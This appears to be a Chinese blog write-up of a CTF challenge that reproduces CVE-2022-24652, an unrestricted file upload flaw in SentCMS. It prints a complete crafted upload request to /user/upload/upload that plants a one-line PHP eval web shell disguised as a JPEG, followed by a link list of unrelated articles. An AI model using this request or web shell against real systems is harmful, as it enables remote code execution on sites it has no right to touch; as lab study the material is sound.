当前位置: 首页 > news >正文

CVE-2022-24652 漏洞复现

news 来源:原创 2024/5/19 8:42:50

CVE-2022-24652

开题

image-20240217160907617

后台管理是thinkphp的,但是工具没检测出漏洞。

image-20240217160935703

登陆后界面如下,上传头像功能值得引起注意

image-20240217162423183

这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload

参考文章:

阿里云漏洞库 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库

Sentcms任意文件上传漏洞 | Hanayuzu’Blog

image-20240217163203276

抓包上传文件,由于没有上传文件按钮,我们手动构建上传包。

修改包:

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpegJay17
<?php eval($_POST[1]);?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--

image-20240217163823624

访问呢恶意文件,getshell

image-20240217164029557

相关文章:

  • 嵌入式面试:瑞芯微
  • 【ArcGIS微课1000例】0103:导出点、线、面要素的折点坐标值
  • Code Composer Studio (CCS) - Breakpoint (断点)
  • 【数据结构与算法】图的搜索——广度优先遍历、最小生成树
  • Java基础知识学习:深入理解Java中的类与对象,Java重要知识点概念性解释,结合实例讲解请看下一篇博文
  • Ansible file文件模块 设置文件的属性,比如创建文件、创建链接文件、删除文件
  • 《白话C++》第10章 STL和boost,Page88 std::shared_ptr常用功能02
  • 数据分析 — 动画图 pyecharts
  • 服务端和客户端以及前后端相关概念区分
  • GPT-3 训练自己的数据教程详解
  • Java学习心得感悟
  • 安全基础~通用漏洞6
  • springboot文件上传需要的配置
  • 【软考中级备考笔记】计算机体系结构
  • 四、详解Redis集群
  • 2017-09-12 前端日报
  • 4月23日世界读书日 网络营销论坛推荐《正在爆发的营销革命》
  • android高仿小视频、应用锁、3种存储库、QQ小红点动画、仿支付宝图表等源码...
  • android图片蒙层
  • C++类的相互关联
  • Date型的使用
  • docker python 配置
  • If…else
  • JavaScript 事件——“事件类型”中“HTML5事件”的注意要点
  • PaddlePaddle-GitHub的正确打开姿势
  • React as a UI Runtime(五、列表)
  • Vue源码解析(二)Vue的双向绑定讲解及实现
  • 笨办法学C 练习34:动态数组
  • 发布国内首个无服务器容器服务,运维效率从未如此高效
  • 分类模型——Logistics Regression
  • 关于使用markdown的方法(引自CSDN教程)
  • 基于 Babel 的 npm 包最小化设置
  • 码农张的Bug人生 - 见面之礼
  • 名企6年Java程序员的工作总结,写给在迷茫中的你!
  • 前端之React实战:创建跨平台的项目架构
  • 如何用vue打造一个移动端音乐播放器
  • 小程序滚动组件,左边导航栏与右边内容联动效果实现
  • 学习使用ExpressJS 4.0中的新Router
  • 优化 Vue 项目编译文件大小
  • ionic入门之数据绑定显示-1
  • 回归生活:清理微信公众号
  • ​什么是bug?bug的源头在哪里?
  • (android 地图实战开发)3 在地图上显示当前位置和自定义银行位置
  • (多级缓存)多级缓存
  • (强烈推荐)移动端音视频从零到上手(上)
  • (十一)图像的罗伯特梯度锐化
  • (原創) 物件導向與老子思想 (OO)
  • (最简单,详细,直接上手)uniapp/vue中英文多语言切换
  • .class文件转换.java_从一个class文件深入理解Java字节码结构
  • .NET Core WebAPI中使用swagger版本控制,添加注释
  • .NET core 自定义过滤器 Filter 实现webapi RestFul 统一接口数据返回格式
  • .net on S60 ---- Net60 1.1发布 支持VS2008以及新的特性
  • .NET 表达式计算:Expression Evaluator
  • .net和php怎么连接,php和apache之间如何连接
  • .NET简谈互操作(五:基础知识之Dynamic平台调用)